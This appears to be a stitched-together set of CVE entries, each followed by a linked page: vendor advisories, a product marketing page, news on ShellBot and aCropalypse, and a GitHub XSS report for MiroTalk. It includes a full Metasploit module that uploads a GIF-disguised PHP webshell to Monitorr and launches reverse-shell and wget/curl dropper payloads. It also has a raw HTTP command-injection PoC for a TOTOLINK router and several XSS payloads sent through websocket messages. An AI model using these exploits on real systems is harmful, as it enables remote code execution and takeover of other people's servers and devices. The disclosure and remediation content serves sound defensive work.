Zoho ManageEngine ADSelfService Plus through 6203 is vulnerable to a brute-force attack that leads to a password reset on IDM applications.

**Security advisory for CVE-2022-36413**

Vulnerability details

Severity

High

CVE ID

CVE-2022-36413

Affected software versions

Builds 6217 and older

Fixed version

Build 6218

Fixed on

March 3, 2023

**Details**

This security advisory for ManageEngine ADSelfService Plus pertains to an OTP–brute-force issue in the Password Sync Agent that could affect integrated third-party applications.

**Impact**

Attackers could exploit this vulnerability using specialized, highly sophisticated machines to reset passwords and take control over integrated third-party applications.

**Fix**

*   The OTP length has been increased to 16 characters
*   The API throttling threshold has been decreased significantly

**Steps to upgrade**

*   Update your ADSelfService Plus instance to build 6218 using the service pack.
*   Update the Password Sync Agent on all the DCs it is installed on, using these steps.

**Acknowledgements**

This issue was reported by Skay through Zoho's Bug Bounty program.

Please contact our product support or security@manageengine.com if you need further assistance.

**Request Support**

Need further assistance? Fill this form, and we'll contact you rightaway.

Highlights

**Password self-service**

Free Active Directory users from attending lengthy help desk calls by allowing them to self-service their password resets/ account unlock tasks. Hassle-free password change for Active Directory users with ADSelfService Plus ‘Change Password’ console. 

**One identity with Single sign-on**

Get seamless one-click access to 100+ cloud applications. With enterprise single sign-on, users can access all their cloud applications with their Active Directory credentials. Thanks to ADSelfService Plus! 

**Password Synchronizer**

Synchronize Windows Active Directory user password/account changes across multiple systems, automatically, including Office 365, G Suite, IBM iSeries and more. 

**Password Policy Enforcer**

Ensure strong user passwords that resist various hacking threats with ADSelfService Plus by enforcing Active Directory users to adhere to compliant passwords via displaying password complexity requirements.

**Directory Self-Update & Corporate Search**

Portal that lets Active Directory users update their latest information and a quick search facility to scout for information about peers by using search keys, like contact number, of the personality being searched.

CVE-2022-36413: CVE-2022-36413 – ManageEngine ADSelfService Plus

TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the enabled parameter at /setting/setWanIeCfg.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取enabled参数中的内容传递给v30，之后将v30带入到Uci\_Set\_Str\_By\_Idx函数中

在Uci\_Set\_Str\_By\_Idx函数中，程序将a5带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setWanIeCfg",
"enabled":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2023-27135: ttt/29 at main · Am1ngl/ttt

This Metasploit module exploits an arbitrary file upload vulnerability and achieves remote code execution in the Monitorr application. Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation. Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges under which the web services run (typically user www-data). Monitorr versions 1.7.6m, 1.7.7d, and below are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Monitorr unauthenticated Remote Code Execution (RCE)',        'Description' => %q{          This module exploits an arbitrary file upload vulnerability and achieving an RCE in the Monitorr application.          Using a specially crafted request, custom PHP code can be uploaded and injected through endpoint upload.php because of missing input validation.          Any user privileges can exploit this vulnerability and it results in access to the underlying operating system with the same privileges          under which the web services run (typically user www-data).          Monitorr 1.7.6m, 1.7.7d and below are affected.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Metasploit module          'Lyhins Lab' # discovery        ],        'References' => [          [ 'CVE', '2020-28871' ],          [ 'URL', 'https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/' ],          [ 'URL', 'https://attackerkb.com/topics/UNlzoDVL3o/cve-2020-28871' ],          [ 'EDB', '48980' ],          [ 'PACKETSTORM', '163263' ],          [ 'PACKETSTORM', '170974' ]        ],        'License' => MSF_LICENSE,        'Platform' => [ 'unix', 'linux', 'win', 'php' ],        'Privileged' => false,        'Arch' => [ ARCH_CMD, ARCH_PHP, ARCH_X64, ARCH_X86 ],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ ARCH_X64, ARCH_X86 ],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'curl', 'printf', 'bourne' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Type' => :windows_command,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp'              }            }          ],          [            'Windows EXE Dropper',            {              'Platform' => 'win',              'Arch' => [ARCH_X86, ARCH_X64],              'Type' => :windows_dropper,              'DefaultOptions' => {                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2020-11-16',        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options(      [        OptString.new('TARGETURI', [ true, 'The Monitorr endpoint URL', '/' ]),        OptString.new('WEBSHELL', [          false, 'The name of the webshell with extension to trick the parser like .phtml, .phar, etc. Webshell name will be randomly generated if left unset.', ''        ]),        OptEnum.new('COMMAND', [ true, 'Use PHP command function', 'passthru', [ 'passthru', 'shell_exec', 'system', 'exec' ]], conditions: %w[TARGET != 0])      ]    )  end  def upload_php_code(payload)    # Upload webshell hidden in a GIF with Metasploit payload code    # randomize file name if option WEBSHELL is not set. Use lowercase characters because upload stores file name in lowercase    if datastore['WEBSHELL'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha_lower(8..16)}.php"    else      @webshell_name = datastore['WEBSHELL'].to_s.downcase    end    # construct multipart form data    form_data = Rex::MIME::Message.new    form_data.add_part(payload.prepend("GIF89a#{rand_text_numeric(6..8)}"), 'image/gif', 'binary', "form-data; name=\"fileToUpload\"; filename=\"#{@webshell_name}\"")    res = send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'assets', 'php', 'upload.php'),      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",      'data' => form_data.to_s    })    return false unless res && res.code == 200 && !res.body.blank?    # parse HTML response to find the id with value 'uploadok' that indicates a successful upload    html = res.get_html_document    !!html.at('div[@id="uploadok"]')  end  def execute_command(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    php_cmd_function = Base64.strict_encode64(datastore['COMMAND'])    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'assets', 'data', 'usrimg', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_get' => {        @get_param => php_cmd_function      },      'vars_post' => {        @post_param => payload      }    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'assets', 'data', 'usrimg', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def check    res = send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'assets', 'js', 'version', 'version.txt'),      'ctype' => 'application/x-www-form-urlencoded'    })    if res && res.code == 200 && !res.body.blank?      # version 0.8.6d is the first release where versioning using version.txt is introduced according the release notes.      version = Rex::Version.new(res.body)      return CheckCode::Vulnerable("Monitorr version: #{version}") if version.between?(Rex::Version.new('0.8.6'), Rex::Version.new('1.7.7'))    end    CheckCode::Unknown  end  def exploit    # select webshell depending on the target setting (PHP or others).    # randomize and encode all parameters to obfuscate the payload and execution    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    @get_param = Rex::Text.rand_text_alphanumeric(1..8)    if target['Type'] == :php      @webshell = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"    else      @webshell = "<?=base64_decode($_GET[\'#{@get_param}\'])(base64_decode($_POST[\'#{@post_param}\']));?>"    end    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    fail_with(Failure::NotVulnerable, "Webshell #{@webshell_name} upload failed, the system is likely patched.") unless upload_php_code(@webshell)    register_file_for_cleanup(@webshell_name.to_s)    case target['Type']    when :php      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager(linemax: 65536)    when :windows_command      execute_command(payload.encoded)    when :windows_dropper      execute_cmdstager(flavor: :psh_invokewebrequest, linemax: 65536)    end  endend

Monitorr 1.7.6m / 1.7.7d Remote Code Execution

An issue was discovered in Veritas NetBackup before 10.0 on Windows. A vulnerability in the way the client validates the path to a DLL prior to loading may allow a lower-level user to elevate privileges and compromise the system.

**Revision History**

*   1.0: April 28, 2023 – Initial release

**Issue: Privilege Escalation**

A vulnerability in the way NetBackup Windows OS client validates the path to a DLL prior to loading may allow a lower level user to elevate privileges and compromise the system.

*   CVE ID: CVE-2023-28759
*   Severity: High
*   CVSS v3.1 Base Score: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
*   Impacted Components:
    *   NetBackup Windows OS clients only, under the following conditions:
        *   Microsoft Exchange, Microsoft SharePoint, and/or Enterprise Vault workloads are being protected
        *   If these applications are installed on the client but not protected by NetBackup, the systems are not impacted
        *   NetBackup clients protecting other workloads are not impacted
*   Affected Versions: All versions prior to 10.0
*   Recommended action:
    *   NetBackup Windows OS clients: Upgrade to 10.0 or later
    *   Disable nbdisco if above mentioned workloads are not protected by NetBackup

**Questions**

For questions or problems regarding this vulnerability please contact Veritas Technical Support (https://www.veritas.com/support)

**Acknowledgement**

Veritas would like the thank the Lockheed Martin Red Team for notifying us about this issue.

**Disclaimer**

THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE.

Veritas Technologies LLC  
2625 Augustine Drive  
Santa Clara, CA 95054

CVE-2023-28759: Security Advisory Impacting NetBackup Windows OS Clients

IS Decisions UserLock MFA 11.01 is vulnerable to authentication bypass using scheduled task.

**Secure Access for Active Directory Identities, Anywhere**

With MFA, SSO and session management, UserLock can protect all employee access to corporate networks and cloud applications, whether on-site or remote.

Start a Free Trial Book a demo

**One On-Premise Active Directory Identity For secure On-Site, Cloud and Remote Access**

 

**Single Sign-On**

Secure and frictionless access to Microsoft 365 and Cloud applications using only your AD credentials, from anywhere.

Learn more

**Contextual Access Management**

Set rules to authorize, deny or limit any login (including remote access), based on contextual factors:

*   **Origin:** Computer (Windows & Mac), device & location restrictions (such as country, IP address, department, and OU)
*   **Time:** Logon hour restrictions, maximum session length and session time quota
*   **Session type:** Workstation, terminal, Wi-Fi, VPN and IIS sessions
*   **Simultaneous connections:** Limit concurrent logins and initial access points

Learn more

 

**User Login Reporting**

A centralized hub to produce and audit reports on all Active Directory user login events and attempts. Meet regulatory compliance standards, support forensics and track down threats.

Learn more

 

« UserLock offers a level of protection that small, medium and large business should be implementing as part of their security roadmap »

Ricky Magalhaes  
Information Security Analyst

**MFA and Access Management. The Easy Way.**

Easy-to-Use, Enterprise-Caliber Security for On-Premise and Hybrid Active Directory Environments of Any Size

****Protect All AD** User Credentials**

Stop unauthorized access from compromised credentials. Secure AD accounts with strong authentication and granular access policies, before damage is done.

****Manage All AD** User Sessions**

Get real-time visibility and a centralized audit trail on all access events across the hybrid network. Monitor and interact remotely with any session directly from the UserLock console.

****Get Compliant** on Securing Access**

Satisfy regulatory and insurance requirements by proving that all access and usage of data is identifiable, audited and attributed to an individual user.

**Simple to Use**

UserLock is quick to deploy, intuitive to manage, and scales effortlessly for any number of users, to ease the burden on IT.

**Non-Disruptive**

UserLock works seamlessly alongside your existing Active Directory infrastructure, reducing complexity and frustration.

**Easily Adopted**

UserLock’s granular controls allow for customized restrictions that protects access without unnecessarily impeding employees.

**Cost Effective**

Building on your investment in Active Directory, UserLock offers additional, effective and affordable security that stops threats, before damage is done.

**Trusted by over 3400 Organizations**

A proven solution for both small to medium-sized businesses (SMBs) and large organizations,  
including some of the most regulated and security-conscious in the world.

*   MSP & SMBs
*   Government  
    & Defense
*   Finance
*   Healthcare
*   Education
*   Manufacturing  
    & Transportation

UserLock is the best 2FA solution I’ve seen. It’s affordable, easy to install and maintain – an IT Manager’s dream.

**Bill Hopkins**  
Network Administrator at City of Keizer, Oregon

     

We found UserLock very easy to implement and will recommend it to other branches within the bank.

**IT Officer**  
Branch of a Multinational Banking Group, Hong Kong

      

Once we set up UserLock, it was easy to deploy and use. UserLock does what I want it to do and it works.

**Meadville Medical Center**  
Lead Support Tech, Meadville Medical Center

     

UserLock is the ideal solution that helps us meet our network access objectives effectively.

**Don Manning**  
Server Administrator at Albany City School District, New York, United States

      

UserLock MFA is a high quality, full-featured product that performs as advertised.

**Michael Commons**  
System Administrator at Dobbs Peterbilt

      

**Client  
**Testimonials****

 Review by Bill Hopkins - City of Keizer  

**Affordable, Easy to Use With Active Directory**

UserLock allows us to have one single 2FA solution for all of our users. It integrates easily with Active Directory, and is simple to install and maintain. It’s basically an IT Manager’s dream.

 Review by Andreas L.  

**Simple and Reliable**

I've tested several 2FA software. In the end, I stuck with UserLock because it requires no administrative effort. I really like the reports and the control of who is connected to which device.

 Review by Bob B.  

**An Administrators Premier Management Tool!**

In a flash, I can control my users’ login experience, find/identify users computers and remote in for support. It’s just always there for me. I can’t imagine working without it now.

 Review by Gov't Network Tech  

**Awesome Tool For Securing Logons**

Userlock has been a great tool and helped us tighten up our user security. It's used in conjunction with Active Directory and Group Policy to secure all logon types in the domain.

**Expert **Reviews****

« UserLock's solution makes implementing multi-factor authentication (MFA) extremely easy. »

Read the Review

« The MFA for RDP significantly enhances security, especially today with a boom in remote working. »

Read the Review

« The perfect access security partner for Windows Active Directory environments. »

Read the Review

« UserLock is a powerful product that focuses on preventing the internal and external threats related to compromised credentials. »

Read the Review

**Start a free trial now**

30-day full version with no user limits

**MSP Console****The **Licensing Management**  
Platform for UserLock**

The new console for managed service providers (MSPs) is a web-based platform that lets you administer UserLock licenses for all your customers.

Read more

**What's new in UserLock**

**2FA Push Notifications with the UserLock Push App**

Quickly respond to 2FA push notifications from your smartphone

*   Enable Push notifications as a **main or additional MFA method**
*   Easily onboard users with **quick self-enrollment**
*   Choose between **one-tap push approval or a TOTP code**
*   Ensure users **approve the correct request** with location, device, and login attempt info

UserLock Push notifications are a **subscription-only feature**.

Learn more

**New features in the UserLock Web App**

Monitor and respond to network sessions quickly, easily, and from anywhere – and access all-new reporting capabilities.

*   Review key user and session **monitoring** insights
*   Simplify daily **management** and widen UserLock access for IT
*   Manage custom **MFA parameters** and help requests
*   View **MFA configuration** methods per user
*   Get drill-down **reporting** capabilities with improved filtering
*   **Export reports** easily
*   **Apply filters** on admin action reports

Learn more

**UserLock VPN Connect**

Simplify MFA on VPN connections with the new UserLock VPN Connect tool. Simply select your VPN, enter your password, and complete MFA – all in one easy-to-use interface.

Learn more

**MFA for Cloud connections with SSO**

Use existing on premise AD identities for secure and seamless MFA on employee access to Microsoft 365 and cloud applications.

Learn more

**Secure Remote Access with UserLock Anywhere**

Enable UserLock Anywhere to protect remote access when employees aren't connected to the corporate network.

Learn more

**Request a personalized demo now**

Discover how UserLock can help you meet your needs.

**Download UserLock**

*   Latest version
*   Beta version

The trial version offers:

*   30-day full version
*   no user limits
*   free technical support

Supported systems

Please read the Beta Testing Procedure before installing this version.

The beta version includes:

*   30-day full version
*   no user limits
*   free technical support

CVE-2023-23192: Protect Active Directory Identities with 2FA and SSO | UserLock

In Malwarebytes before 4.5.23, a symbolic link may be used delete any arbitrary file on the system by exploiting the local quarantine system. It can also lead to privilege escalation in certain scenarios.

**SUMMARY:**

 In Malwarebytes before 4.5.22.236, a symbolic link may be used delete any arbitrary file on the system by exploiting the local quarantine system. It can also lead to privilege escalation in certain scenarios.

**AFFECTED VERSIONS**

*   Malwarebytes for Windows < v4.5.22.236

**PATCHED VERSIONS**

*   Malwarebytes for Windows: v4.5.22.236.

**MITIGATION ADVICE**

**We recommend upgrading the affected endpoints to the patched versions.**

**DETAILS**

**CWE**

**CVS 3.x**

**Vector**

CWE-269: Improper Privilege Management

8.6 High

Local

**RECOGNITION**

filip\_000

**REFERENCES**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26088

CVE-2023-26088: CVE-2023-26088 - Malwarebytes for Windows - Arbitrary file deletion and privilege escalation

By Deeba Ahmed
As per a report from AhnLab Security Emergency Response Center (ASEC), poorly managed Linux SSH servers are becoming…
This is a post from HackRead.com Read the original post: ShellBot DDoS Malware Targets Linux SSH Servers

As per a report from AhnLab Security Emergency Response Center (ASEC), poorly managed Linux SSH servers are becoming the targets of a new campaign in which different variants of ShellBot malware are being deployed.

**What is meant by Poorly Managed Servers?**

Poorly managed services refer to weak account credentials, which make the server vulnerable to dictionary attacks. Services such as MS-SQL and RDP (remote desktop protocol) are often targeted.

In Linux servers, SSH (secure shell) services are the primary targets. In IoT environments, dictionary attacks are targeted against the Telnet service installed on an embedded Linux OS or an old Linux server.

**What is ShellBot?**

ShellBot, also known as PerIBot, is an old DDoS bot malware developed in Perl. The malware typically uses Internet Relay Chat/IRC protocol to establish communication with its C2 server.

Currently, the malware is being used to launch attacks against insecure Linux systems, targeting servers with weak credentials. It is deployed on a system after attackers use scanner malware to determine whether the system has SSH port 22 open.

**Attack Details**

ASEC researchers noted that ShellBot was used in attacks targeting Linux servers that were distributing cryptocurrency miners through a shell script compiler.

“If ShellBot is installed, Linux servers can be used as DDoS Bots for DDoS attacks against specific targets after receiving a command from the threat actor,” ASEC’s report read.

The attack begins by using a list of SSH credentials to launch a dictionary attack and breach the server. Once this is accomplished, the threat actor deploys the payload and leverages the IRC protocol to communicate with the C2 server and receive commands that instruct ShellBot to conduct DDoS attacks and steal data.

**Different ShellBot Variants Used in the Campaign**

According to ASEC researchers, three variants of ShellBot were identified, including LiGhT’s Modded perlbot v2, DDoS PBot v2.0, and PowerBots (C) GohacK. The first two versions feature a wide range of DDoS attack commands with HTTP, UDP, and TCP protocols.

Conversely, PowerBots are equipped with backdoor-like capabilities that can provide shell access and upload arbitrary files from the infected host. Threat actors can use these backdoor capabilities for the installation of additional malware and launch different types of attacks, abusing the server.

1.  Windows, Linux and macOS Users Hit by APT Group
2.  Multi-platform SysJoker backdoor hits Linux Devices
3.  DDoS Malware ‘Chaos’ Hits Linux and Windows Devices

ShellBot DDoS Malware Targets Linux SSH Servers

Image-editing tools from Google and Microsoft contain the “aCropalypse” bug, which can reveal information users intentionally removed.

At the beginning of March, Google released an update for its flagship Pixel smartphones to patch a vulnerability in the devices’ default photo-editing tool, Markup. Since its 2018 introduction in Android 9, Markup’s photo-cropping tool had been quietly leaving data in a cropped image file that could be used to reconstruct some or all of the original image beyond the confines of the crop. Though now fixed, the vulnerability is significant because Pixel users have for years been making, and in many cases presumably sharing, cropped images that may still contain the private or sensitive data the user was attempting to eliminate. But it gets worse.

The bug, dubbed “aCropalypse,” was discovered and originally submitted to Google by security researcher and college student Simon Aarons, who collaborated on the work with fellow reverse engineer David Buchanan. The pair were stunned to discover this week that a very similar version of the vulnerability is also present in other photo-cropping utilities from a totally separate yet equally ubiquitous codebase: Windows. The Windows 11 Snipping Tool and Windows 10 Snip & Sketch tool are vulnerable in cases where a user takes a screenshot, saves it, crops the screenshot, and then saves the file again. Photos cropped with Markup, meanwhile, retained too much data even when the user applied the crop before first saving the photo. 

Microsoft told WIRED on Wednesday that it is “aware of these reports” and that it is “investigating,” adding, “we will take action as needed.”

“It was pretty mind-blowing really, it was as if lightning had just struck twice,” says Buchanan. “The original Android vulnerability was already surprising enough that it hadn’t been discovered already. It was quite surreal.”

Now that the vulnerabilities are out in the open, researchers have started uncovering old discussions on programming forums where developers noticed the odd behavior of the cropping tools. But Aarons seems to have been the first to recognize the potential security and privacy implications—or at least the first to bring the findings to Google and Microsoft.

“I actually noticed it at about 4 in the morning by total accident when I spotted that a small screenshot I sent of white text on a black background was a 5 MB file, and that didn’t seem right to me,” Aarons says.

Images impacted by aCropalypse often can’t be completely recovered, but they can be substantially reconstructed. Aarons provided examples, including one in which he was able to recover his credit card number after he attempted to crop it out of a photo. In short, there is a population of photos out there that contain more information than they should—specifically, information that someone intentionally tried to remove.

Microsoft hasn’t issued any fixes yet, but even those released by Google don’t mitigate the situation for existing image files cropped in the years when the tool was still vulnerable. Google points out, though, that image files shared on some social media and communication services may automatically strip out the errant data.

“As part of their existing compression process, apps and websites that recompress images, like Twitter, Instagram, or Facebook, delete extra data automatically from images uploaded. Images posted to sites like these are not at risk,” Google spokesperson Ed Fernandez says in a statement.

The researchers point out, though, that this is not true of all platforms, including Discord.

As a Discord user, Buchanan say he kept seeing people posting cropped screenshots, and it was really hard to not say anything before the vulnerability was publicly disclosed.

Steven Murdoch, a professor of security engineering at University College London, notes that in 2004 he discovered a vulnerability in which an older version of an image was stored in the thumbnail data for the image even after it had been altered.  

“This isn’t the first time I’ve seen this sort of vulnerability,” Murdoch says. “And I think the reason is because when software is written, it’s tested to make sure that the thing you expect is there. You save an image, you can open the image, and then you’re done. What is not checked is whether there is accidentally extra data stored.”

The thumbnail vulnerability Murdoch found in 2004 was conceptually similar to aCropalypse from a data privacy standpoint but had very different technical underpinnings because of issues in application programming interface design. And Murdoch emphasizes that while he sees aCropalypse as a problem for users whose affected photos are already out in the world, its biggest impact may come from the discussions it has raised about how to promote better security practices in API development and implementation.

“This has triggered some interesting conversations about API design and what do you do to teach people to avoid this sort of vulnerability in the future? This is not something that we train people to deal with,” Murdoch says. “It’s not one of these ‘sky is falling’ vulnerabilities, but it’s not good.”

Bug in Google Markup, Windows Photo-Cropping Tools Exposes Removed Image Data

A cross-site scripting (XSS) vulnerability in MiroTalk P2P before commit f535b35 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the settings module.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

l4rm4nd opened this issue

Feb 17, 2023

· 14 comments

Closed

**Multiple Cross-Site Scripting (XSS) #139**

l4rm4nd opened this issue

Feb 17, 2023

· 14 comments

**Comments**

**Describe the bug**

The mirotalk web application is susceptible to XSS.

If two participants joined a web meeting, one participant can change their name, which is then reflected for all other meeting participants. Since no input validation takes place; or output filtering to sanitize maliciously choosen names, the payload of an attacker is executed in the browser of other victims.

This can introduce various problems and attack vectors, such as:

*   Hijacking of user sessions
*   Defacing of the web site
*   Inserting malicious content into the response
*   Redirect users to malicious pages
*   Hijack the user’s browser using malware

**To Reproduce**

Steps to reproduce the behavior:

1.  Go to https://p2p.mirotalk.com/ and create a new room. Join the room yourself.
2.  Start a second private browser window to simulate another user. Join the same room via invite link e.g.
3.  After joining the meeting, change your name via settings to <img src="x" onerror=alert(document.domain)>
4.  Verify a JavaScript popup in both browser meeting rooms. You successfully XSS'd other users.

**Expected behavior**

A meeting participant's name should always be sanitized before being displayed or embedded into the website's content.

**Screenshots**

**Desktop - Mobile**

Please complete the following information:

*   Device or OS: Windows 10
*   Browser: Microsoft Edge, likely any other browser affected too
*   Version: 110.0.1587.46

**Additional context**

*   https://owasp.org/www-community/attacks/xss/
*   https://cheatsheetseries.owasp.org/cheatsheets/Cross\_Site\_Scripting\_Prevention\_Cheat\_Sheet.html

**Recommendation**

*   Sanitize untrusted user inputs.
*   Define a security policy for this github repo to gain information on how to reach out to you about security issues

Other from that, many thanks for this projects. Really, really cool!

Copy link

Contributor Author

BTW, the file upload function (share a file) is also susceptible.

Any user can upload a file with a XSS payload in the filename. For example Sun'><img src=x onerror=alert(1)>set.jpg.

As the filename is reflected at multiple locations in the web application (e.g. in the chat screen or upload popup), this again can XSS other meeting participants.

 l4rm4nd changed the title Stored Cross-Site Scripting (XSS) Multiple Stored Cross-Site Scripting (XSS)

Feb 17, 2023

 l4rm4nd changed the title Multiple Stored Cross-Site Scripting (XSS) Multiple Cross-Site Scripting (XSS)

Feb 18, 2023

Hello @l4rm4nd,

Thanks so much for reporting this to me, it should be fixed now.  
XSS no longer runs in the participants room, it is blocked before it is sent.

> Other from that, many thanks for this projects. Really, really cool!

Thank you so much, I'm very happy you like it!

Join with us on Discord and Have a good weekend.

Copy link

Contributor Author

Hi @miroslavpejic85,

many thanks for the fast reply and fix.

Your fix works as intended on the client side. Malicious names or filenames are not transfered to other participants but blocked before sending.

However, this validation only happens on the client side via JS. An attacker can easily intercept a valid name modification or file transfer via websockets (that is not blocked before sending) and just modify the request directly. On the participant's side, no validation or sanitization will take place and the XSS payloads will trigger again.

An example websocket request for file transfer would look like this:

    42["fileInfo",{"room_id":"08662TinyTowel","broadcast":true,"peer_name":"Kali","peer_id":"am6Y_BhRyop_UOzkAAmj","file":{"fileName":"<img src=x onerror=alert(document.domain)>","fileSize":156,"fileType":"image/png"}}]
    

So your fix does not mitigate XSS, unfortunately.

Here an example for name changing via websockets:

Copy link

Contributor Author

It's a general problem with output sanitization, since input validation will always be easily bypassed due to JS and websockets.

For example, the raising hand feature is also susceptible. An attacker can easily modify the websocket request and again modify the peer\_name. XSS on all participants, as the peer\_name is reflected.

    42["peerStatus",{"room_id":"97337HotCouch","peer_name":"<img src=x onerror=alert(document.domain)>","element":"hand","status":true}]
    

Copy link

Contributor Author

Same for sharing a video. Peer name can again be weaponized for XSS. The opened video player on the participant's side will reflect which peer opened the video.

    42["videoPlayer",{"room_id":"97337HotCouch","peer_name":"Kali<img src=x onerror=alert(document.domain)>","video_action":"open","video_src":"https://www.youtube.com/embed/uxELAbwB19c?autoplay=1","peer_id":null}]
    

BTW, this also allows for impersonification. So an attacker could easily fake the peer_name and specify another participants name and share an inappropriate video. Other participants will only see the text "<PEER\_NAME> opened a video..." and would be like "what the f\*ck ....".

Copy link

Contributor Author

So sorry to spam the project with security issues but I really love this project.

It is so much better than other web meeting platforms and provides a lot of cool and thoughtful features.

If we get things like these sorted, it's just brilliant <3!

Hi @l4rm4nd, Don't worry, I'm very glad you care about security!

I added the XSS sanitization on the server side, in theory now should everything be fixed regarding the xss?

Can you confirm please? Thank you!

> It is so much better than other web meeting platforms and provides a lot of cool and thoughtful features.

Thank you for your nice feedback! :)

> If we get things like these sorted, it's just brilliant <3!

Sure, Thanks to your cooperation everything will be improved - fixed ;)

Copy link

Contributor Author

hi @miroslavpejic85,

good job using the js-xss library. Looks like the XSS is successfully fixed.

I've even tried some older XSS payloads to especially bypass js-xss from Portswigger XSS Cheatsheet. No luck.

    <script>Object.prototype.whiteList = {img: ['onerror', 'src']}</script><script>document.write(filterXSS('<img src onerror=alert(1)>'))</script>
    

The only thing that is now still possible is HTML injection. But honestly, the impact for this is kinda low.

And some self-XSS popups that are not exploitable for other participants. Will only trigger a JS popup for the attacker himself. Should be fixed too but there is no security impact/risk leaving it as is.

For example a name change to <img src=x onerror=alert(1)> or a file upload with filename of Sun'><img src=x onerror=alert(1)>set.jpg gets blocked by your client.js fix and the messages invalid name and filename are shown. However, the JS payload is nonetheless executed (only in the attackers browser though; so a self-xss issue with no impact).

Hi @l4rm4nd,

Nice to hear your again.

> good job using the js-xss library. Looks like the XSS is successfully fixed.

Thank you, yes, seems very good!

> The only thing that is now still possible is HTML injection. But honestly, the impact for this is kinda low.

I agree with you.

